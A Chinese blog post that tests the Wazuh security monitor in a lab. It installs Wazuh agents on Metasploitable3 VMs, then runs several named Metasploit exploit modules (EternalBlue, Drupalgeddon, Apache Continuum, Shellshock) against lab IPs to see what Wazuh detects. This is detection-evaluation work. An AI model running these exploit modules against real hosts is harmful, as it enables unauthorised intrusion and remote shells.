很简单,参考官方的安装指南,https://documentation.wazuh.com/current/installation-guide/open-distro/all-in-one-deployment/all_in_one.html,一开始是直接用的一键式安装,安装了两次也没成功,最后还是用一步一步手动安装搞定的,
然后就是安装客户端的代理软件,
用的之前实践过的metasploitable3-win2k8.box和metasploitable3-ub1404.box,
windows的下载https://packages.wazuh.com/4.x/windows/wazuh-agent-4.1.5-1.msi,
安装命令,wazuh-agent.msi /q WAZUH_MANAGER=10.90.11.220 WAZUH_REGISTRATION_SERVER=10.90.11.220 WAZUH_AGENT_GROUP=default,
ubuntu的下载https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent_4.1.5-1_amd64.deb,
安装命令,sudo WAZUH_MANAGER=10.90.11.220 WAZUH_REGISTRATION_SERVER=10.90.11.220 WAZUH_AGENT_GROUP=default dpkg -i wazuh-agent_4.1.5-1_amd64.deb,
并使能启动,sudo systemctl daemon-reload,
sudo systemctl enable wazuh-agent,
sudo systemctl restart wazuh-agent,
对metasploitable3-win2k8.box做个攻击并获得反弹shell,
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.90.11.244
exploit
看wazuh那边的反应,看到报了先登录失败然后登录成功的日志,
这样的效果并不理想,接着再看linux的,
对metasploitable3-ub1404.box连续做了两个攻击并都获得反弹shell,
use exploit/multi/http/drupal_drupageddon
set RHOSTS 10.90.11.242
set TARGETURI /drupal/
exploit
use exploit/linux/http/apache_continuum_cmd_exec
set RHOSTS 10.90.11.242
exploit
wazuh那边都啥反应没有,
后来又做了一个没成功的攻击,
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS 10.90.11.242
set TARGETURI /cgi-bin/hello_world.sh
exploit
wazuh那边有反应了,
总结来说,wazuh在真实的攻击下并不能达到实用的效果,尽管wazuh的日志还匹配了ATT&CK,
本文始发于微信公众号(云计算和网络安全技术实践):wazuh的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论